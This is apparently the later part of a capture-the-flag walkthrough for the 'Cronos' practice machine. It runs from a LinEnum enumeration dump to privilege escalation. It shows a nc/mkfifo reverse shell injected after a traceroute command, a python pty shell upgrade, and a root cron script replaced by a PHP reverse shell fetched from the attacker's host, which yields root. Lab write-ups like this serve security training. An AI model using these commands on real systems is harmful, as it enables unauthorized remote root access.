root       241  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_32]
root       242  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_32]
root       274  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       277  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kworker/1:1H]
root       343  0.0  0.0      0     0 ?        S<   Nov07   0:00 [raid5wq]
root       366  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kdmflush]
root       367  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       376  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kdmflush]
root       379  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       388  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       422  0.0  0.0      0     0 ?        S    Nov07   0:00 [jbd2/dm-0-8]
root       423  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ext4-rsv-conver]
root       467  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kworker/0:1H]
root       468  0.0  0.3  28504  3168 ?        Ss   Nov07   0:01 /lib/systemd/systemd-journald
root       493  0.0  0.0      0     0 ?        S<   Nov07   0:00 [iscsi_eh]
root       504  0.0  0.0      0     0 ?        S    Nov07   0:00 [kauditd]
root       516  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ib_addr]
root       524  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ib_mcast]
root       525  0.0  0.1 102968  1360 ?        Ss   Nov07   0:00 /sbin/lvmetad -f
root       529  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ib_nl_sa_wq]
root       540  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ib_cm]
root       541  0.0  0.0      0     0 ?        S<   Nov07   0:00 [iw_cm_wq]
root       543  0.0  0.0      0     0 ?        S<   Nov07   0:00 [rdma_cm]
root       544  0.0  0.3  44700  3988 ?        Ss   Nov07   0:00 /lib/systemd/systemd-udevd
root       871  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ext4-rsv-conver]
systemd+   950  0.0  0.2 100324  2368 ?        Ssl  Nov07   0:00 /lib/systemd/systemd-timesyncd
root      1044  0.0  0.2  29008  2588 ?        Ss   Nov07   0:00 /usr/sbin/cron -f
root      1050  0.0  1.9 145320 20160 ?        Ssl  Nov07   0:00 /usr/lib/snapd/snapd
root      1059  0.0  0.1   4400  1280 ?        Ss   Nov07   0:00 /usr/sbin/acpid
syslog    1061  0.0  0.3 256396  3212 ?        Ssl  Nov07   0:00 /usr/sbin/rsyslogd -n
root      1065  0.0  0.4 605084  4220 ?        Ssl  Nov07   0:04 /usr/bin/lxcfs /var/lib/lxcfs/
message+  1068  0.0  0.3  42956  3796 ?        Ss   Nov07   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root      1106  0.0  0.7 185728  7444 ?        Ssl  Nov07   0:10 /usr/bin/vmtoolsd
root      1107  0.0  0.1  20100  1172 ?        Ss   Nov07   0:00 /lib/systemd/systemd-logind
root      1108  0.0  0.5 275860  5392 ?        Ssl  Nov07   0:00 /usr/lib/accountsservice/accounts-daemon
daemon    1110  0.0  0.1  26044  1988 ?        Ss   Nov07   0:00 /usr/sbin/atd -f
root      1147  0.0  0.0  13376   148 ?        Ss   Nov07   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1180  0.0  0.5 277180  5480 ?        Ssl  Nov07   0:00 /usr/lib/policykit-1/polkitd --no-debug
bind      1238  0.0  2.1 289648 21688 ?        Ssl  Nov07   0:01 /usr/sbin/named -f -u bind -4
root      1248  0.0  0.5  65520  5236 ?        Ss   Nov07   0:00 /usr/sbin/sshd -D
root      1273  0.0  0.0   5224   120 ?        Ss   Nov07   0:00 /sbin/iscsid
root      1274  0.0  0.3   5724  3508 ?        S<Ls Nov07   0:02 /sbin/iscsid
mysql     1282  0.0 15.4 1567520 157212 ?      Ssl  Nov07   0:07 /usr/sbin/mysqld
root      1310  0.0  0.0      0     0 ?        S    Nov07   0:00 [kworker/1:5]
root      1344  0.0  0.1  15940  1660 tty1     Ss+  Nov07   0:00 /sbin/agetty --noclear tty1 linux
root      1360  0.0  0.2  19620  2168 ?        Ss   Nov07   0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root      1389  0.0  2.2 325588 22980 ?        Ss   Nov07   0:01 /usr/sbin/apache2 -k start
root      1560  0.0  0.0      0     0 ?        S    Nov07   0:00 [kworker/0:1]
root      1687  0.0  0.0      0     0 ?        S    Nov07   0:00 [kworker/0:2]
root      2688  0.0  0.0      0     0 ?        S    00:55   0:00 [kworker/u4:1]
www-data  3087  0.0  0.3  19028  3852 ?        S    01:01   0:00 /bin/bash ./LinEnum.sh
www-data  3088  0.0  0.3  19072  3632 ?        S    01:01   0:00 /bin/bash ./LinEnum.sh
www-data  3089  0.0  0.0   4384   652 ?        S    01:01   0:00 tee -a
www-data  3290  0.0  0.2  19056  3020 ?        S    01:02   0:00 /bin/bash ./LinEnum.sh
www-data  3291  0.0  0.2  34424  2940 ?        R    01:02   0:00 ps aux
www-data  7513  0.0  0.9 326000  9144 ?        S    00:10   0:00 /usr/sbin/apache2 -k start
www-data  7539  0.0  1.0 326152 10716 ?        S    00:11   0:00 /usr/sbin/apache2 -k start
www-data  7557  0.0  1.1 326152 11480 ?        S    00:12   0:00 /usr/sbin/apache2 -k start
www-data  7593  0.0  1.6 326360 16844 ?        S    00:13   0:00 /usr/sbin/apache2 -k start
www-data  7704  0.0  1.0 326144 10780 ?        S    00:23   0:00 /usr/sbin/apache2 -k start
www-data  7713  0.0  1.0 326152 10720 ?        S    00:23   0:00 /usr/sbin/apache2 -k start
www-data  7714  0.0  1.2 326152 12328 ?        S    00:23   0:00 /usr/sbin/apache2 -k start
www-data  7715  0.0  1.0 326144 10780 ?        S    00:23   0:00 /usr/sbin/apache2 -k start
www-data  7743  0.0  0.9 326000  9676 ?        S    00:26   0:00 /usr/sbin/apache2 -k start
www-data  7753  0.0  1.1 326144 11556 ?        S    00:27   0:00 /usr/sbin/apache2 -k start
www-data  7859  0.0  0.0   4508   712 ?        S    00:38   0:00 sh -c traceroute 8.8.8.8 & rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f
www-data  7863  0.0  0.0   4536   740 ?        S    00:38   0:00 cat /tmp/f
www-data  7864  0.0  0.1   4508  1720 ?        S    00:38   0:00 /bin/sh -i
www-data  7865  0.0  0.1  11304  1588 ?        S    00:38   0:00 nc 10.10.14.8 1234
root      8092  0.0  0.0      0     0 ?        S    00:49   0:00 [kworker/u4:2]


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using  EditLine wrapper


[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2016-07-14T12:32:26


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 setenvif_module (shared)
 status_module (shared)


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1667 Apr  9  2017 /etc/passwd
-rw-r--r-- 1 root root 832 Apr  9  2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1191 Apr  9  2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16  2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16  2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29  2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar  7  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29  2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29  2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29  2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29  2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29  2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29  2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29  2016 /usr/bin/passwd


[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16  2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16  2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11  2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29  2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr  6  2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16  2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29  2016 /usr/bin/expiry


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7788 Mar 22  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 338 Nov 18  2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 100 Nov 25  2015 /etc/sos.conf
-rw-r--r-- 1 root root 1371 Jan 28  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 350 Mar 22  2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2084 Sep  6  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 6816 Nov 30  2016 /etc/overlayroot.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 3028 Feb 15  2017 /etc/adduser.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 19  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 14867 Apr 12  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Mar 22  2017 /etc/kernel-img.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/noulis/.bash_history


[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 820 Mar 22  2017 /var/backups/group.bak
-rw------- 1 root root 1632 Mar 22  2017 /var/backups/passwd.bak
-rw------- 1 root shadow 690 Mar 22  2017 /var/backups/gshadow.bak
-rw------- 1 root shadow 1068 Mar 22  2017 /var/backups/shadow.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Feb 15  2017 .
drwxr-xr-x 14 root root 4096 Mar 22  2017 ..


### SCAN COMPLETE ####################################


INTERESTING CRON SCRIPT OWNED BY ROOT
/var/www/laravel/artisan

UPGRADE SHELL
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cronos:/tmp$ export TERM=xterm
export TERM=xterm
www-data@cronos:/tmp$ 

CHECK LARAVEL DIRECTORY
www-data@cronos:/tmp$ ls -l /var/www/laravel/artisan
ls -l /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan
www-data@cronos:/tmp$ ls -l /var/www/html/laravel
l
www-data@cronos:/tmp$ ls -l /var/www/laravel
ls -l /var/www/laravel
total 1988
-rw-r--r--  1 www-data www-data     727 Apr  9  2017 CHANGELOG.md
drwxr-xr-x  6 www-data www-data    4096 Apr  9  2017 app
-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan
drwxr-xr-x  3 www-data www-data    4096 Apr  9  2017 bootstrap
-rw-r--r--  1 www-data www-data    1300 Apr  9  2017 composer.json
-rw-r--r--  1 www-data www-data  121424 Apr  9  2017 composer.lock
-rwxr-xr-x  1 www-data www-data 1836198 Apr  9  2017 composer.phar
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 config
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 database
-rw-r--r--  1 www-data www-data    1062 Apr  9  2017 package.json
-rw-r--r--  1 www-data www-data    1055 Apr  9  2017 phpunit.xml
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 public
-rw-r--r--  1 www-data www-data    3424 Apr  9  2017 readme.md
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 resources
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 routes
-rw-r--r--  1 www-data www-data     563 Apr  9  2017 server.php
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 storage
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 tests
drwxr-xr-x 31 www-data www-data    4096 Apr  9  2017 vendor
-rw-r--r--  1 www-data www-data     555 Apr  9  2017 webpack.mix.js

REVIEW ARTISAN SCRIPT
www-data@cronos:/tmp$ cat /var/www/laravel/artisan
cat /var/www/laravel/artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);

SWAP ARTISAN SCRIPT WITH PENTESTMONKEY REVERSE SHELL SCRIPT
root@kali:~/htb/cronos# cp /usr/share/webshells/php/php-reverse-shell.php  .
root@kali:~/htb/cronos# cp php-reverse-shell.php artisan.php
root@kali:~/htb/cronos# vim  artisan.php

ww-data@cronos:/tmp$ wget http://10.10.14.8/artisan.php
wget http://10.10.14.8/artisan.php
--2020-11-08 04:12:20--  http://10.10.14.8/artisan.php
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [application/octet-stream]
Saving to: 'artisan.php'

artisan.php         100%[===================>]   5.36K  --.-KB/s    in 0.002s  

2020-11-08 04:12:20 (3.31 MB/s) - 'artisan.php' saved [5491/5491]

www-data@cronos:/tmp$ ls -l
ls -l
total 356
-rwxr--r-- 1 www-data www-data  46631 Nov  8 00:51 LinEnum.sh
-rw-r--r-- 1 www-data www-data   5491 Nov  8 04:07 artisan.php
prw-r--r-- 1 www-data www-data      0 Nov  8 04:12 f
-rwxr--r-- 1 www-data www-data 293889 Nov  8 00:42 linpeas.sh
drwx------ 3 root     root       4096 Nov  7 20:24 systemd-private-665ee6021c0042e2aa1515f4f7141b93-systemd-timesyncd.service-XXgVeK
drwx------ 2 www-data www-data   4096 Nov  8 00:52 tmux-33
drwx------ 2 root     root       4096 Nov  7 20:27 vmware-root
www-data@cronos:/tmp$ cp artisan.php /var/www/laravel 
cp artisan.php /var/www/laravel
www-data@cronos:/tmp$ ls -l /var/www/laravel
ls -l /var/www/laravel
total 1996
-rw-r--r--  1 www-data www-data     727 Apr  9  2017 CHANGELOG.md
drwxr-xr-x  6 www-data www-data    4096 Apr  9  2017 app
-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan
-rw-r--r--  1 www-data www-data    5491 Nov  8 04:12 artisan.php
drwxr-xr-x  3 www-data www-data    4096 Apr  9  2017 bootstrap
-rw-r--r--  1 www-data www-data    1300 Apr  9  2017 composer.json
-rw-r--r--  1 www-data www-data  121424 Apr  9  2017 composer.lock
-rwxr-xr-x  1 www-data www-data 1836198 Apr  9  2017 composer.phar
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 config
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 database
-rw-r--r--  1 www-data www-data    1062 Apr  9  2017 package.json
-rw-r--r--  1 www-data www-data    1055 Apr  9  2017 phpunit.xml
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 public
-rw-r--r--  1 www-data www-data    3424 Apr  9  2017 readme.md
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 resources
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 routes
-rw-r--r--  1 www-data www-data     563 Apr  9  2017 server.php
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 storage
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 tests
drwxr-xr-x 31 www-data www-data    4096 Apr  9  2017 vendor
-rw-r--r--  1 www-data www-data     555 Apr  9  2017 webpack.mix.js
www-data@cronos:/tmp$ mv /var/www/laravel/artisan.php /var/www/laravel/artisan 
mv /var/www/laravel/artisan.php /var/www/laravel/artisan
www-data@cronos:/tmp$ ls -l
ls -l
total 356
-rwxr--r-- 1 www-data www-data  46631 Nov  8 00:51 LinEnum.sh
-rw-r--r-- 1 www-data www-data   5491 Nov  8 04:07 artisan.php
prw-r--r-- 1 www-data www-data      0 Nov  8 04:14 f
-rwxr--r-- 1 www-data www-data 293889 Nov  8 00:42 linpeas.sh
drwx------ 3 root     root       4096 Nov  7 20:24 systemd-private-665ee6021c0042e2aa1515f4f7141b93-systemd-timesyncd.service-XXgVeK
drwx------ 2 www-data www-data   4096 Nov  8 00:52 tmux-33
drwx------ 2 root     root       4096 Nov  7 20:27 vmware-root

GET ROOT SHELL
root@kali:~/htb/cronos# nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.8] from cronos.htb [10.10.10.13] 35822
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:14:01 up  7:46,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

GET ROOT FLAG
# cat /root/root.txt
######################################

